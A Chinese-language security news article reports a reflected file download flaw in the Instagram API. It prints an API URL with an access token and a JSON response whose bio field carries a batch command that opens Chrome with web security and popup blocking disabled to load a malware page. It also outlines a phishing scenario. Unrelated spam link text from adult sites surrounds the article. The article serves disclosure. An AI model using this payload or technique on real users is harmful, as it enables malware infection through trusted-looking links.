成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

以假亂真:利用Instagram API制造惡意分享鏈接

安全 應用安全
安全研究人員最近發現了一種利用Instagram API形成的惡意分享鏈接,由于這個鏈接指向Instagram域名,所以很容易被用戶相信并下載。如果在釣魚攻擊中利用該漏洞,可以極大地提高攻擊效率。

安全研究人員最近發現了一種利用Instagram API形成的惡意分享鏈接,由于這個鏈接指向Instagram域名,所以很容易被用戶相信并下載。如果在釣魚攻擊中利用該漏洞,可以極大地提高攻擊效率。

[[130590]]

漏洞詳情

這個RFD(反射型文件名下載)漏洞存在于Instagram API中。通過篡改任何用戶賬號的訪問令牌并使用一些技巧,攻擊者可以創建一個惡意文件下載鏈接。同時由于這個鏈接指向Instagram域名上的合法資源,所以很難被用戶覺察。

 “我在Instagram API上發現了一個RFD(反射型文件名下載),不需要向URL上添加任何指令,因為我們可以使用一個持久型反射域來實現它,例如用戶賬號上的“Bio”域。

那么,我們需要什么呢?僅僅需要一個令牌。不過不用擔心,我們只需注冊一個新的賬號就能得到一個令牌。下一步,插入我們想在用戶賬號的“Bio”域(或其他域)中使用的批處理指令。接著,我將嘗試用Chrome瀏覽器打開一個包含惡意代碼的新頁面,該惡意頁面可以禁用該瀏覽器中的大多數保護機制。”

為了構建“反射型部分”,Sopas在用戶賬號的“Bio”域中插入了一個批處理指令,并解釋說插入到其他域也可以實現同樣的功能。然后,他用Chrome瀏覽器打開一個包含惡意代碼的新頁面,該惡意頁面可以禁用瀏覽器中的大多數保護機制。

通過分析了用戶的Instagram JSON文件,然后通過修改JSON文件來實現“文件名部分”:

https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

由于“文件名部分”的限制,這種附加方法只能在特定的瀏覽器中正常工作,這些瀏覽器包括Chrome、Opera、Chrome安卓版、安卓stock瀏覽器和火狐瀏覽器。

攻擊演示視頻

在他的攻擊中,Sopas使用了一個特定的文件名,他創建的完整鏈接可以被發送到受害者的Instagram消息中。

下面的視頻演示了該攻擊的PoC:

Sopas假設了以下可能的攻擊場景:

1、惡意用戶向他所有的Instagram好友發送一條消息,其中包含一個指向惡意頁面的鏈接。

2、受害者點擊鏈接,檢查并發現該文件存儲在Instagram服務器,下載并運行它。

3、受害者感染惡意軟件。

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2012-04-21 19:02:25

黑客Instagram

2022-02-20 23:57:29

人工智能語音合成技術

2020-12-28 12:39:53

面部識別人工

2025-05-21 09:43:26

2015-06-12 10:27:46

2021-06-08 10:23:12

人工智能人臉識別Deepfake

2023-03-29 10:04:18

圖像AI

2023-11-10 00:09:25

人工智能虛假圖片

2019-02-15 14:33:56

AI模型翻譯語言

2019-02-18 11:26:49

AI 數據人工智能

2020-11-13 07:08:35

AI人工智能

2025-04-02 07:30:00

2021-06-15 10:07:13

AI 數據人工智能

2017-06-08 11:11:32

互聯網

2025-02-14 23:10:41

2024-05-16 13:51:00

AI

2012-02-10 09:26:47

Instagram

2012-04-16 15:34:18

Instagram

2023-04-25 13:54:07

游戲AI

2022-05-05 09:04:33

惡意軟件黑客
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久精品国产一区二区 | 亚洲图片一区二区三区 | 亚洲福利 | 国产美女自拍视频 | av永久| 在线免费观看黄a | 蜜桃毛片 | 成人久久久久久久久 | 成人精品福利 | 国产精品美女www | 日本淫视频 | 欧美夜夜 | 天天天插 | 国产精品永久 | 日韩欧美一区二区三区四区 | 久久久一区二区三区 | 日本在线看片 | 殴美黄色录像 | 国产精品成人av | 日韩高清在线观看 | 国产在线一区二区三区 | 精品一二区 | 色一阁| 青青草亚洲| 亚洲欧美激情精品一区二区 | 欧洲一区二区在线 | 精品一区二区三区在线观看国产 | 天天干,夜夜操 | 亚洲精品一区二区网址 | 国产日韩欧美综合 | 中文字幕高清 | 日本黄色高清视频 | 超碰国产在线 | 超级乱淫av片免费播放 | 国产伦精品一区二区三区照片91 | 久久精品欧美电影 | www.色综合 | 91福利在线导航 | 人人看人人爽 | 亚洲视频中文字幕 | 一级片在线观看视频 |